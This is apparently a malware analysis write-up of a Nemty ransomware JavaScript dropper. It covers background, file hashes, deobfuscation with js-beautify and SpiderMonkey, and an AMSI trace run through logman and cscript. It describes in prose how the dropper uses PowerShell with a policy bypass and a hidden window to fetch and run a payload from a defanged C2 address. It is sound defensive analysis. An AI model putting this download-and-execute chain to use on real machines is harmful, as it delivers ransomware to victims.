-
Nemty ransomware was first observed in the wild in August 2019 and its behavior is noted for being similar to GandCrab and Sodinokibi.
-
The source code includes an affiliate ID, which suggests its deployment as a service (rather than being used by a single threat actor for their own campaigns).
-
By default, the typical ransom request would be $1,000 worth of BTC (approximately 1/10th of a bitcoin at that time).
-
The malware is not very sophisticated, including some weirdly redundant features. For example, it known to perform a language check for several ex-USSR countries, but still proceeds with execution regardless (whereas Locky on the other hand, stops if it detects Language ID
0x19
which is the language ID code for Russian). -
At the time of this writing, Nemty has never been formally attributed to a specific threat actor.
-
Historically, it has been delivered via at least one botnet and one or more exploit kits.
-
Fortinet has a great technical write-up here.
Hash Type | File Hash |
---|---|
MD5 | ce58fe36343afdbe2b2a36f123ecb9a7 |
SHA1 | ce17790e9c0d1547f25aa3d30e38b5f17eb9fc8a |
SHA-256 | f3e743c919c1deaf5108d361c4ff610187606f450fabda0bea3786d4063511b1 |
- The sample for this analysis is a
.js
file which appears to be heavily obfuscated.
-
Viewing the full contents of the script in Visual Studio Code, this script is very ugly. We can clean it up with
js-beautify
. -
Viewing the beautified contents, we see two instances of the
eval
command. In JavaScript, theeval
command "evaluates JavaScript code represented as a string and returns its completion value." (source: Mozilla).
-
The presence of the eval commands implies that the script will de-obfuscate itself and execute. Since this is the case, the next step will be to emulate it with
SpiderMonkey
usingjs -f malscript.js
. -
Luckily, this turns out to be a very simple script once de-obfuscated.
-
We can also run it on a Windows machine using
cscript
, which is the built-in Windows scripting host. If we use this in combination with AMSI, we can actually see the contents of the.js
file de-obfuscated. -
To do this, we start from an administrative PowerShell console:
logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
cscript malscript.js
logman stop AMSITrace -ets
AMSIScriptContentRetrieval > malscript-output.txt
- Here's a sample of what the output looks like after having used AMSI Script Content Retrieval:
- The malicious
.js
file appears to instantiate two ActiveX objects - aWScript
shell and ashell.application
. - It then executes
cmd.exe
and passes a command to it that executes PowerShell to do the following:
- Bypass the execution policy
- Spawn a hidden window
- Create a new web client object
- Use the newly created web client object to reach out to
http://92.63.197[.]190/nnn[.]exe
with a very specific user-agentGoogle Chrome
and save the payload in the%temp%
directory aserb19.exe
. - Lastly, it executes the newly staged payload.
- This sample is a Nemty ransomware dropper that arrives to the end user as a heavily obfuscated
.js
file. - After the end user double-clicks it, it will be executed by
cscript
and execute malicious PowerShell viacmd.exe
. - The PowerShell creates a new web-client object, assigns a
Google Chrome
user-agent, and downloads the second stage payload from the C2 server. - Lastly, the new payload gets executed on the victim machine.